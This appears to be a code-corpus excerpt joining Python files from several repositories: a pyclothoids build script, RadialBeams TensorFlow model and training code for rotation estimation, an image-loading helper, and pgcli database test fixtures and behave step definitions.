with tempfile.NamedTemporaryFile('w', suffix='.cpp') as f:
f.write('int main (int argc, char **argv) { return 0; }')
try:
compiler.compile([f.name], extra_postargs=[flagname])
except setuptools.distutils.errors.CompileError:
return False
return True
def cpp_flag(compiler):
"""Return the -std=c++[11/14/17] compiler flag.
The newer version is prefered over c++11 (when it is available).
"""
flags = ['-std=c++11'] #'-std=c++17', '-std=c++14',
for flag in flags:
if has_flag(compiler, flag): return flag
raise RuntimeError('Unsupported compiler -- at least C++11 support '
'is needed!')
class BuildExt(build_ext):
"""A custom build extension for adding compiler-specific options."""
c_opts = {
'msvc': ['/EHsc'],
'unix': [],
}
l_opts = {
'msvc': [],
'unix': [],
}
if sys.platform == 'darwin':
darwin_opts = ['-stdlib=libc++', '-mmacosx-version-min=10.7']
c_opts['unix'] += darwin_opts
l_opts['unix'] += darwin_opts
def build_extensions(self):
ct = self.compiler.compiler_type
opts = self.c_opts.get(ct, [])
link_opts = self.l_opts.get(ct, [])
if ct == 'unix':
opts.append('-DVERSION_INFO="%s"' % self.distribution.get_version())
opts.append(cpp_flag(self.compiler))
if has_flag(self.compiler, '-fvisibility=hidden'):
opts.append('-fvisibility=hidden')
elif ct == 'msvc':
opts.append('/DVERSION_INFO=\\"%s\\"' % self.distribution.get_version())
for ext in self.extensions:
ext.extra_compile_args = opts
ext.extra_link_args = link_opts
build_ext.build_extensions(self)
# read the contents of your README file
this_directory = abspath(dirname(__file__))
with open(join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='pyclothoids',
version=__version__,
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/phillipd94/PyClothoids',
description='A library for clothoid curves in Python',
long_description=long_description,
long_description_content_type='text/markdown',
packages = ['pyclothoids'],
ext_modules=extensions,
install_requires=['pybind11>=2.4'],
setup_requires=['pybind11>=2.4'],
cmdclass={'build_ext': BuildExt},
zip_safe=False,
)
``` |
{
"source": "johSchm/RadialBeams",
"score": 2
} |
#### File: RadialBeams/src/learning.py
```python
import math
import tensorflow as tf
from tqdm import tqdm
def training(model, train_dataset, val_dataset, test_dataset, optimizer, lines, angles,
epochs=128, name='', continuous=False, prior='off'):
pbar = tqdm(range(epochs), desc='---')
for e in pbar:
# validation, before training to log also the init behaviour of the model
val_circle_loss = []
for i, sample in enumerate(val_dataset):
x = tf.concat([sample['vec'][:, None], sample['vec_rot'][:, None]], axis=1)
pred_facts, pred_angle, conv_latents, gnn_latents, distance_matrix, \
x1_emb, x2_emb, angle_energy, rnn_encoding = model(x)
unit_circle_loss, _ = loss_func(pred_angle, pred_facts, angles, sample['angle'], continuous=continuous)
val_circle_loss.append(unit_circle_loss)
# testing / deployment
test_circle_loss = []
for i, sample in enumerate(test_dataset):
# duplicate the second (rotated) augmentation image and ignore the angle branch output
# (batch x augmentation x size_vector_field x proximity x pixel_count_per_vector x channels)
pred_facts, pred_angle, conv_latents, gnn_latents, distance_matrix, \
x1_emb, x2_emb, angle_energy, rnn_encoding = model(
tf.tile(sample['vec_rot'][:, None, ...], [1, 2, 1, 1, 1, 1]))
unit_circle_loss, _ = loss_func(pred_angle, pred_facts, angles, sample['angle'], continuous=continuous)
test_circle_loss.append(unit_circle_loss)
# training
train_circle_loss = []
for i, sample in enumerate(train_dataset):
with tf.GradientTape() as tape:
x = tf.concat([sample['vec'][:, None], sample['vec_rot'][:, None]], axis=1)
pred_facts, pred_angle, conv_latents, gnn_latents, distance_matrix, \
x1_emb, x2_emb, angle_energy, rnn_encoding = model(x)
unit_circle_loss, toeplitz_loss = loss_func(pred_angle, pred_facts, angles,
sample['angle'], continuous=continuous)
if prior == 'off':
loss = unit_circle_loss
elif prior == 'linear':
k = e / (epochs - 1)
loss = k * unit_circle_loss + (1 - k) * toeplitz_loss
else:
loss = unit_circle_loss + toeplitz_loss
grads_model = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(grads_model, model.trainable_variables))
train_circle_loss.append(unit_circle_loss)
pbar.set_description("Training loss {0:.3f} | Validation loss {1:.3f} | Testing loss {2:.3f}".format(
tf.reduce_mean(train_circle_loss), tf.reduce_mean(val_circle_loss), tf.reduce_mean(test_circle_loss)))
tf.keras.models.save_model(model, 'model/' + name + '.h5py', include_optimizer=False)
def loss_func(pred_angle: tf.Tensor, pred_facts, angles, gt_angles, continuous=False) -> tuple:
""" Regression since this respects the spatial angle information.
That is, if the prediction is 30 degree but the true is 35 degree,
a regression will respect the closeness which is ignored by a categorical loss.
DO NOT USE tf.reduce_sum(angle_factor_distr * angles[None, :], axis=-1)
since this introduces symmetries, like 0.5 * 10 + 0.5 * 20 = 0.1 * 50 + 0.5 * 20
"""
d = tf.constant(0.)
if not continuous:
# invert the angle since we would like to rotate back
# from an optimization perspective that shouldn't make a difference
cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, label_smoothing=0, axis=-1)
# log to encourage exploration
d = cce(gt_angles, pred_facts)
gt_angles = (tf.reduce_sum(angles[None, :] * gt_angles, axis=-1) * math.pi) / 180.
a = (tf.math.sin(gt_angles) - pred_angle[:, 1]) ** 2 + (tf.math.cos(gt_angles) - pred_angle[:, 0]) ** 2
return tf.reduce_mean(a), tf.reduce_mean(d)
```
#### File: RadialBeams/src/model.py
```python
import tensorflow as tf
import numpy as np
class GraphConvolutionLayer(tf.keras.layers.Layer):
def __init__(self, units, A, activation=tf.identity, rate=0.0, l2=0.0):
super(GraphConvolutionLayer, self).__init__()
self.activation = activation
self.units = units
self.rate = rate
self.l2 = l2
self.A = A
def build(self, input_shape):
self.W = self.add_weight(
shape=(input_shape[-1], self.units),
dtype=self.dtype,
name='gnn_weights',
initializer='glorot_uniform',
regularizer=tf.keras.regularizers.l2(self.l2)
)
def call(self, X):
"""
input (batch x vector x hidden)
output (batch x vector x hidden)
"""
X = tf.nn.dropout(X, self.rate)
X = self.A @ X @ self.W
return self.activation(X)
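# Illustrative usage (hypothetical shapes, following the call() docstring
# above): with an adjacency A of shape (n, n) and node features X of shape
# (batch, n, hidden), GraphConvolutionLayer(64, A)(X) returns features of
# shape (batch, n, 64), propagated as A @ X @ W.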
def wheel_graph_adjacency_matrix(n_vectors):
adjacency = np.zeros([n_vectors + 1, n_vectors + 1])
adjacency[0, 1] = 1
adjacency[0, n_vectors - 1] = 1
for i in range(1, n_vectors - 1):
adjacency[i, i-1] = 1
adjacency[i, -1] = 1
adjacency[n_vectors - 1, n_vectors - 2] = 1
adjacency[n_vectors - 1, 0] = 1
return tf.cast(adjacency, tf.float32)
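# Illustrative trace (not part of the original module): for n_vectors = 4 the
# returned 5x5 matrix (last index = hub node) is
#   [[0, 1, 0, 1, 0],
#    [1, 0, 0, 0, 1],
#    [0, 1, 0, 0, 1],
#    [1, 0, 1, 0, 0],
#    [0, 0, 0, 0, 0]]
# i.e. every rim node points to at least one rim neighbour, rim nodes
# 1..n_vectors-2 also point to the hub (last column), and the hub row itself
# is empty.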
def angle_matrix(n_vectors: int) -> tf.Tensor:
""" Returns triangular matrix degrading to the center
"""
matrix = tf.fill([n_vectors, n_vectors], float(n_vectors))
for i in tf.range(n_vectors):
matrix -= tf.linalg.band_part(tf.ones((n_vectors, n_vectors)), i, -1)
matrix += tf.linalg.band_part(tf.ones((n_vectors, n_vectors)), 0, i)
return matrix - float(n_vectors) * tf.eye(n_vectors)
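# Illustrative trace (not part of the original module): for n_vectors = 3 the
# result is [[0, 2, 1], [1, 0, 2], [2, 1, 0]], i.e. entry (i, j) equals the
# circular offset (i - j) mod n_vectors, with zeros on the diagonal.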
def toeplitz_extractor(n_vectors: int) -> tf.Tensor:
return tf.cast(
[tf.roll(tf.eye(n_vectors), shift=i, axis=0) for i in tf.range(n_vectors)],
tf.float32)
class BeamEncoder(tf.keras.layers.Layer):
def __init__(self, hidden=128, target_size=28, activation=tf.nn.leaky_relu, n_pixels=14, **kwargs):
super().__init__(**kwargs)
self.hidden = hidden
self.activation = activation
self.target_size = target_size
self.n_pixels = n_pixels
self.w_init = tf.keras.initializers.HeNormal()
self.b_init = tf.constant_initializer(0.01)
self.proxkernels = []
self.tempkernels = []
def build(self, input_shape):
# general output: (batch x 2 x vec x 1 x n-2 x H/8)
self.proxkernels = [
# (batch x augmentation=2 x vec x proximity=3 x pixels=14 x 1) -> (batch x 2 x vec x 3-2 x n-2 x H/8)
tf.keras.layers.Conv2D(self.hidden // 8, (3, 3), data_format="channels_last",
activation=self.activation, padding='valid'),
]
# eg fashion mnist
if self.n_pixels == 14:
self.tempkernels = [
# (batch x 2 x vec x 1 x 14-2 x H/8) -> (batch x 2 x vec x 1 x 14-5 x H/4)
tf.keras.layers.Conv1D(self.hidden // 4, 4, activation=self.activation,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 14-5 x H/8) -> (batch x 2 x vec x 1 x 14-8 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 14-8 x H/8) -> (batch x 2 x vec x 1 x 14-11 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 14-11 x H/4) -> (batch x 2 x vec x 1 x 14-14 x H/2)
tf.keras.layers.Conv1D(self.hidden // 1, 3, activation=self.activation,
padding='valid', data_format="channels_last")
]
# eg cifar
elif self.n_pixels == 16:
self.tempkernels = [
# (batch x 2 x vec x 1 x 16-2 x H/8) -> (batch x 2 x vec x 1 x 16-5 x H/4)
tf.keras.layers.Conv1D(self.hidden // 4, 4, activation=self.activation,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 16-5 x H/8) -> (batch x 2 x vec x 1 x 16-8 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 16-8 x H/8) -> (batch x 2 x vec x 1 x 16-11 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 16-11 x H/4) -> (batch x 2 x vec x 1 x 16-14 x H/2)
tf.keras.layers.Conv1D(self.hidden // 1, 4, activation=self.activation,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 16-14 x H/4) -> (batch x 2 x vec x 1 x 16-16 x H/2)
tf.keras.layers.Conv1D(self.hidden // 1, 2, activation=self.activation,
padding='valid', data_format="channels_last")
]
elif self.n_pixels == 32:
self.tempkernels = [
# (batch x 2 x vec x 1 x 32-2 x H/8) -> (batch x 2 x vec x 1 x 32-6/2=13 x H/4)
tf.keras.layers.Conv1D(self.hidden // 4, 5, activation=self.activation, strides=2,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13 x H/8) -> (batch x 2 x vec x 1 x 13-3 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13-3 x H/8) -> (batch x 2 x vec x 1 x 13-6 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13-6 x H/8) -> (batch x 2 x vec x 1 x 13-9 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13-9 x H/8) -> (batch x 2 x vec x 1 x 13-11 x H/4)
tf.keras.layers.Conv1D(self.hidden // 1, 3, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13-11 x H/8) -> (batch x 2 x vec x 1 x 13-13 x H/4)
tf.keras.layers.Conv1D(self.hidden // 1, 2, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
]
# eg coil100
elif self.n_pixels == 64:
self.tempkernels = [
# (batch x 2 x vec x 1 x 64-2 x H/8) -> (batch x 2 x vec x 1 x 64-6/2=29 x H/4)
tf.keras.layers.Conv1D(self.hidden // 4, 5, activation=self.activation, strides=2,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 29 x H/8) -> (batch x 2 x vec x 1 x 29-3/2=13 x H/4)
tf.keras.layers.Conv1D(self.hidden // 4, 4, activation=self.activation, strides=2,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13 x H/8) -> (batch x 2 x vec x 1 x 13-3 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13-3 x H/8) -> (batch x 2 x vec x 1 x 13-6 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13-6 x H/8) -> (batch x 2 x vec x 1 x 13-9 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13-9 x H/8) -> (batch x 2 x vec x 1 x 13-11 x H/4)
tf.keras.layers.Conv1D(self.hidden // 1, 3, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13-11 x H/8) -> (batch x 2 x vec x 1 x 13-13 x H/4)
tf.keras.layers.Conv1D(self.hidden // 1, 2, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
]
# eg lfw
elif self.n_pixels == 125:
self.tempkernels = [
# (batch x 2 x vec x 1 x 125-2 x H/8) -> (batch x 2 x vec x 1 x 125-5/2 x H/8)
tf.keras.layers.Conv1D(self.hidden // 4, 4, activation=self.activation, strides=2,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 60 x H/8) -> (batch x 2 x vec x 1 x 60-2/2 x H/8)
tf.keras.layers.Conv1D(self.hidden // 4, 3, activation=self.activation, strides=2,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 29 x H/8) -> (batch x 2 x vec x 1 x 29-3/2=13 x H/4)
tf.keras.layers.Conv1D(self.hidden // 4, 4, activation=self.activation, strides=2,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13 x H/8) -> (batch x 2 x vec x 1 x 13-3 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13-3 x H/8) -> (batch x 2 x vec x 1 x 13-6 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13-6 x H/8) -> (batch x 2 x vec x 1 x 13-9 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13-9 x H/8) -> (batch x 2 x vec x 1 x 13-11 x H/4)
tf.keras.layers.Conv1D(self.hidden // 1, 3, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13-11 x H/8) -> (batch x 2 x vec x 1 x 13-13 x H/4)
tf.keras.layers.Conv1D(self.hidden // 1, 2, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
]
else:
raise ValueError('Other n pixels not yet supported!')
def call(self, inputs, training=None):
""" convolution compressing each vector to a lower dimensional representation
starting with kernel to aggregate the proximity and spatial information
secondly, aggregate the spatial information fully via 1D spatial convolution
:param inputs:
:param training:
:return:
"""
x = inputs
for kernel in self.proxkernels:
x = kernel(x)
for kernel in self.tempkernels:
x = kernel(x)
x = tf.reshape(x, [tf.shape(x)[0], 2, self.target_size, self.hidden])
return x
def get_config(self):
config = {
'hidden': self.hidden,
'activation': self.activation,
'target_size': self.target_size,
'n_pixels': self.n_pixels,
'w_init': self.w_init,
'b_init': self.b_init
}
base = super().get_config()
return dict(list(base.items()) + list(config.items()))
class BIC(tf.keras.layers.Layer):
def __init__(self, hidden=128, activation=tf.nn.leaky_relu, lstm_layers=3,
l2_regularization=0.0, edge_factor=0.5, gcn_layers=3, dropout=0.0,
size_vector_field=28, pixel_count_per_vector=14,
context=True, **kwargs):
super(BIC, self).__init__(**kwargs)
self.context = context
self.l2_regularization = l2_regularization
self.regularizer = tf.keras.regularizers.L2(l2_regularization)
self.size_vector_field = size_vector_field
self.pixel_count_per_vector = pixel_count_per_vector
self.hidden = hidden
self.activation = activation
self.edge_factor = edge_factor
self.gcn_layers = gcn_layers
self.lstm_layers = lstm_layers
self.dropout = dropout
self.w_init = tf.keras.initializers.HeNormal()
self.b_init = tf.constant_initializer(0.01)
self.adjacency = None
self.beamenc = None
self.extractor = None
self.cxtenc = None
self.tempkernels = []
self.gcn = []
self.lstm = []
self.mlp = []
self.cxt_mlp = []
def build(self, input_shape):
self.beamenc = BeamEncoder(hidden=self.hidden, target_size=self.size_vector_field,
activation=self.activation, n_pixels=self.pixel_count_per_vector)
self.adjacency = wheel_graph_adjacency_matrix(self.size_vector_field) * self.edge_factor
self.extractor = toeplitz_extractor(self.size_vector_field)
self.gcn = [
GraphConvolutionLayer(self.hidden, self.adjacency, activation=self.activation,
rate=self.dropout, l2=self.l2_regularization)
for _ in tf.range(self.gcn_layers)
]
self.lstm = [
tf.keras.layers.LSTM(self.hidden, return_sequences=False if tf.equal(i, self.lstm_layers - 1) else True,
name='lstm{}'.format(i))
for i in tf.range(self.lstm_layers)
]
self.mlp = [
tf.keras.layers.Dense(self.hidden // 2,
kernel_initializer=self.w_init, bias_initializer=self.b_init),
tf.keras.layers.Dense(self.hidden // 4,
kernel_initializer=self.w_init, bias_initializer=self.b_init),
tf.keras.layers.Dense(2, #activation=tf.nn.tanh,
kernel_initializer=self.w_init, bias_initializer=self.b_init)
]
self.cxt_mlp = [
tf.keras.layers.Dense(self.hidden,
kernel_initializer=self.w_init, bias_initializer=self.b_init),
tf.keras.layers.Dense(self.hidden, activation=self.activation,
kernel_initializer=self.w_init, bias_initializer=self.b_init)
]
# @tf.function
def call(self, inputs, training=None):
""" convolution compressing each vector to a lower dimensional representation
starting with kernel to aggregate the proximity and spatial information
secondly, aggregate the spatial information fully via 1D spatial convolution
:param inputs:
:param training:
:return:
"""
batch_dim = tf.shape(inputs)[0]
beamencoding = self.beamenc(inputs)
# encode the neighbor / spatial relationships via a GCN (batch x 2 x vec x hidden)
# important to encode neighborhood, since pure black vectors might appear multiple times in an image
# context encoder
ctx = tf.constant(0)
if self.context:
# init the context node with zeros
ctx = tf.concat([beamencoding, tf.zeros([batch_dim, 2, 1, tf.shape(beamencoding)[-1]])], axis=-2)
for i in range(len(self.gcn)):
ctx = self.gcn[i](ctx)
beamencoding += ctx[..., :-1, :]
ctx = ctx[..., -1, :]
# split (batch x 2 x vector x hidden) -> (batch x 1 x vector x hidden) x2
beamencoding_zero, beamencoding_theta = tf.split(beamencoding, num_or_size_splits=2, axis=1)
# reshape to (batch x 1 x vector x hidden) and (batch x vector x 1 x hidden)
# distance matrix | (batch x 1 x vector x hidden) - (batch x vector x 1 x hidden) | = (batch x vector x vector)
beamencoding_zero = tf.reshape(beamencoding_zero, [batch_dim, self.size_vector_field, self.hidden])
beamencoding_theta = tf.reshape(beamencoding_theta, [batch_dim, self.size_vector_field, self.hidden])
        # comparing only the orientation might be even better, since it leaves the magnitude free for the angle decoder
# the higher the closer the vectors
similarity = tf.reduce_sum(
(tf.expand_dims(beamencoding_zero, 1) - tf.expand_dims(beamencoding_theta, 2)) ** 2, -1)
similarity = 1 / (1 + similarity)
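        # Illustrative shape note (added commentary, not part of the original code):
        # expand_dims(zero, 1) has shape (batch, 1, vec, hidden) and expand_dims(theta, 2) has shape
        # (batch, vec, 1, hidden), so the broadcasted difference is (batch, vec, vec, hidden) and the
        # reduce_sum over the last axis yields pairwise squared distances of shape (batch, vec, vec);
        # 1 / (1 + d) then maps them into (0, 1].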
# reshape back to (batch x vector x vector)
prior = tf.reshape(similarity, [batch_dim, self.size_vector_field, self.size_vector_field])
angle_energy = prior
# Hadamard product with shifted Diagonal to extract diagonals from the masked Toeplitz Distance Matrix
# extractor shape (1 x vector x vector x vector)
prior = prior[:, None, ...] * self.extractor[None, ...]
# sum together the elements in the matrix (ie distances) (all others are zero) -> (batch x vector)
        # crucial that a permutation-invariant op is used, since the order on the diagonal does not matter
        # mean instead of sum, since sum leads to overconfident distributions
        # however, since everything except the shifted diagonal is zero, the mean is quite small
        prior = tf.reduce_sum(prior, axis=(-1, -2))
        # distribution over (batch x vector) which represents the shift
prior = tf.nn.softmax(prior, axis=-1)
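        # Illustrative note (added commentary, not part of the original code): the extractor is a stack
        # of row-rolled identity matrices, so prior[:, None, ...] * extractor[None, ...] keeps, in slice k,
        # only the entries lying on the k-shifted (circular) diagonal; summing each slice therefore gives
        # one score per circular shift, and the softmax turns those scores into a distribution over shifts.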
# additionally for the deployment phase, we use a second prediction task ie predicting the
# canonicalization vector 0 (upper left corner) for reference to be able to turn a single image back
unit_vec = beamencoding_theta + ctx[:, 1, None, :] if self.context else beamencoding_theta
unit_vec = tf.reshape(unit_vec, [batch_dim, self.size_vector_field, self.hidden])
# the RNN aims to encode the positional information of the vectors (ordering)
        # which gives rise to the angle of rotation
for i in range(len(self.lstm)):
unit_vec = self.lstm[i](unit_vec)
unit_vec = tf.reshape(unit_vec, [batch_dim, self.hidden])
rnn_encoding = unit_vec
# mlp decoder
for i in range(len(self.mlp)):
unit_vec = self.mlp[i](unit_vec)
unit_vec /= tf.math.sqrt((unit_vec[:, 0] - 0) ** 2 + (unit_vec[:, 1] - 0) ** 2)[:, None]
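        # Added note (interpretation, not from the original code): dividing by the Euclidean norm projects
        # the 2-D output onto the unit circle, so the prediction can be read as (cos, sin) of the rotation angle.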
return prior, unit_vec, beamencoding, ctx, similarity, \
beamencoding_zero, beamencoding_theta, angle_energy, rnn_encoding
def get_config(self):
config = {
'hidden': self.hidden,
'activation': self.activation,
'w_init': self.w_init,
'b_init': self.b_init
}
base = super().get_config()
return dict(list(base.items()) + list(config.items()))
class Block(tf.keras.models.Sequential):
def __init__(self,n,m):
super().__init__()
for i in range(m):
self.add(tf.keras.layers.Conv2D(filters = n, kernel_size=(3,3),
strides=(1,1),padding = 'same',activation = "relu"))
self.add(tf.keras.layers.MaxPool2D(pool_size = (2, 2)))
class Dense(tf.keras.models.Sequential):
def __init__(self,n,m=2):
super().__init__()
for i in range(m):
self.add(tf.keras.layers.Dense(units = n, activation = "relu"))
class VGG11(tf.keras.models.Sequential):
def __init__(self, input_shape, classes, filters = 64):
super().__init__()
self.add(tf.keras.layers.InputLayer(input_shape = input_shape))
# Backbone
self.add(Block(n = filters * 1, m = 1))
self.add(Block(n = filters * 2, m = 1))
self.add(Block(n = filters * 4, m = 2))
self.add(Block(n = filters * 8, m = 2))
self.add(Block(n = filters * 8, m = 2))
# top
self.add(tf.keras.layers.Flatten())
self.add(Dense(n = filters * 64))
self.add(tf.keras.layers.Dense(units = classes,activation = "softmax"))
``` |
{
"source": "JohSchoeneberg/pyLattice_tutorials",
"score": 3
} |
#### File: pyLattice_tutorials/src/extract_data.py
```python
def extract_data_from_filename(file_name):
# package for 3d visualization
#from itkwidgets import view
#from aicssegmentation.core.visual import seg_fluo_side_by_side, single_fluorescent_view, segmentation_quick_view
import matplotlib.pyplot as plt
plt.rcParams["figure.figsize"] = [16, 12]
# package for io
from aicsimageio import AICSImage #, omeTifWriter
reader = AICSImage(file_name)
IMG = reader.data
# #print(IMG.shape)
structure_img = IMG[0,0,:,:,:]
return structure_img
``` |
{
"source": "johshoff/pgcli",
"score": 2
} |
#### File: pgspecial/tests/dbutils.py
```python
import pytest
import psycopg2
import psycopg2.extras
# TODO: should this somehow be divined from the environment?
POSTGRES_USER, POSTGRES_HOST = 'postgres', 'localhost'
def db_connection(dbname=None):
conn = psycopg2.connect(user=POSTGRES_USER, host=POSTGRES_HOST,
database=dbname)
conn.autocommit = True
return conn
try:
conn = db_connection()
CAN_CONNECT_TO_DB = True
SERVER_VERSION = conn.server_version
except:
CAN_CONNECT_TO_DB = False
SERVER_VERSION = 0
dbtest = pytest.mark.skipif(
not CAN_CONNECT_TO_DB,
reason="Need a postgres instance at localhost accessible by user 'postgres'")
def create_db(dbname):
with db_connection().cursor() as cur:
try:
cur.execute('''CREATE DATABASE _test_db''')
except:
pass
def setup_db(conn):
with conn.cursor() as cur:
# schemas
cur.execute('create schema schema1')
cur.execute('create schema schema2')
# tables
cur.execute('create table tbl1(id1 integer, txt1 text)')
cur.execute('create table tbl2(id2 integer, txt2 text)')
cur.execute('create table schema1.s1_tbl1(id1 integer, txt1 text)')
# views
cur.execute('create view vw1 as select * from tbl1')
cur.execute('''create view schema1.s1_vw1 as select * from
schema1.s1_tbl1''')
# datatype
cur.execute('create type foo AS (a int, b text)')
# functions
cur.execute('''create function func1() returns int language sql as
$$select 1$$''')
cur.execute('''create function schema1.s1_func1() returns int language
sql as $$select 2$$''')
def teardown_db(conn):
with conn.cursor() as cur:
cur.execute('''
DROP SCHEMA public CASCADE;
CREATE SCHEMA public;
DROP SCHEMA IF EXISTS schema1 CASCADE;
DROP SCHEMA IF EXISTS schema2 CASCADE''')
```
#### File: features/steps/step_definitions.py
```python
from __future__ import unicode_literals
import pip
import pexpect
import os
import re
from behave import given, when, then
@given('we have pgcli installed')
def step_install_cli(_):
"""
Check that pgcli is in installed modules.
"""
dists = set([di.key for di in pip.get_installed_distributions()])
assert 'pgcli' in dists
@when('we run pgcli')
def step_run_cli(context):
"""
Run the process using pexpect.
"""
context.cli = pexpect.spawnu('pgcli')
context.exit_sent = False
@when('we wait for prompt')
def step_wait_prompt(context):
"""
Make sure prompt is displayed.
"""
_expect_exact(context, '{0}> '.format(context.conf['dbname']), timeout=5)
@when('we send "ctrl + d"')
def step_ctrl_d(context):
"""
Send Ctrl + D to hopefully exit.
"""
context.cli.sendcontrol('d')
context.exit_sent = True
@when('we send "\?" command')
def step_send_help(context):
"""
Send \? to see help.
"""
context.cli.sendline('\?')
@when('we create database')
def step_db_create(context):
"""
Send create database.
"""
context.cli.sendline('create database {0};'.format(
context.conf['dbname_tmp']))
context.response = {
'database_name': context.conf['dbname_tmp']
}
@when('we drop database')
def step_db_drop(context):
"""
Send drop database.
"""
context.cli.sendline('drop database {0};'.format(
context.conf['dbname_tmp']))
@when('we create table')
def step_create_table(context):
"""
Send create table.
"""
context.cli.sendline('create table a(x text);')
@when('we insert into table')
def step_insert_into_table(context):
"""
Send insert into table.
"""
context.cli.sendline('''insert into a(x) values('xxx');''')
@when('we update table')
def step_update_table(context):
"""
    Send update table.
"""
context.cli.sendline('''update a set x = 'yyy' where x = 'xxx';''')
@when('we select from table')
def step_select_from_table(context):
"""
Send select from table.
"""
context.cli.sendline('select * from a;')
@when('we delete from table')
def step_delete_from_table(context):
"""
    Send delete from table.
"""
context.cli.sendline('''delete from a where x = 'yyy';''')
@when('we drop table')
def step_drop_table(context):
"""
Send drop table.
"""
context.cli.sendline('drop table a;')
@when('we connect to test database')
def step_db_connect_test(context):
"""
Send connect to database.
"""
db_name = context.conf['dbname']
context.cli.sendline('\connect {0}'.format(db_name))
@when('we start external editor providing a file name')
def step_edit_file(context):
"""
Edit file with external editor.
"""
context.editor_file_name = 'test_file_{0}.sql'.format(context.conf['vi'])
if os.path.exists(context.editor_file_name):
os.remove(context.editor_file_name)
context.cli.sendline('\e {0}'.format(context.editor_file_name))
_expect_exact(context, 'nano', timeout=2)
@when('we type sql in the editor')
def step_edit_type_sql(context):
context.cli.sendline('select * from abc')
# Write the file.
context.cli.sendcontrol('o')
# Confirm file name sending "enter".
context.cli.sendcontrol('m')
@when('we exit the editor')
def step_edit_quit(context):
context.cli.sendcontrol('x')
@then('we see the sql in prompt')
def step_edit_done_sql(context):
_expect_exact(context, 'select * from abc', timeout=2)
# Cleanup the command line.
context.cli.sendcontrol('u')
# Cleanup the edited file.
if context.editor_file_name and os.path.exists(context.editor_file_name):
os.remove(context.editor_file_name)
@when('we connect to postgres')
def step_db_connect_postgres(context):
"""
Send connect to database.
"""
context.cli.sendline('\connect postgres')
@when('we refresh completions')
def step_refresh_completions(context):
"""
Send refresh command.
"""
context.cli.sendline('\\refresh')
@then('pgcli exits')
def step_wait_exit(context):
"""
Make sure the cli exits.
"""
_expect_exact(context, pexpect.EOF, timeout=5)
@then('we see pgcli prompt')
def step_see_prompt(context):
"""
Wait to see the prompt.
"""
_expect_exact(context, '{0}> '.format(context.conf['dbname']), timeout=5)
@then('we see help output')
def step_see_help(context):
for expected_line in context.fixture_data['help_commands.txt']:
_expect_exact(context, expected_line, timeout=1)
@then('we see database created')
def step_see_db_created(context):
"""
Wait to see create database output.
"""
_expect_exact(context, 'CREATE DATABASE', timeout=2)
@then('we see database dropped')
def step_see_db_dropped(context):
"""
Wait to see drop database output.
"""
_expect_exact(context, 'DROP DATABASE', timeout=2)
@then('we see database connected')
def step_see_db_connected(context):
"""
    Wait to see database connected output.
"""
_expect_exact(context, 'You are now connected to database', timeout=2)
@then('we see table created')
def step_see_table_created(context):
"""
Wait to see create table output.
"""
_expect_exact(context, 'CREATE TABLE', timeout=2)
@then('we see record inserted')
def step_see_record_inserted(context):
"""
Wait to see insert output.
"""
_expect_exact(context, 'INSERT 0 1', timeout=2)
@then('we see record updated')
def step_see_record_updated(context):
"""
Wait to see update output.
"""
_expect_exact(context, 'UPDATE 1', timeout=2)
@then('we see data selected')
def step_see_data_selected(context):
"""
Wait to see select output.
"""
_expect_exact(context, 'yyy', timeout=1)
_expect_exact(context, 'SELECT 1', timeout=1)
@then('we see record deleted')
def step_see_data_deleted(context):
"""
Wait to see delete output.
"""
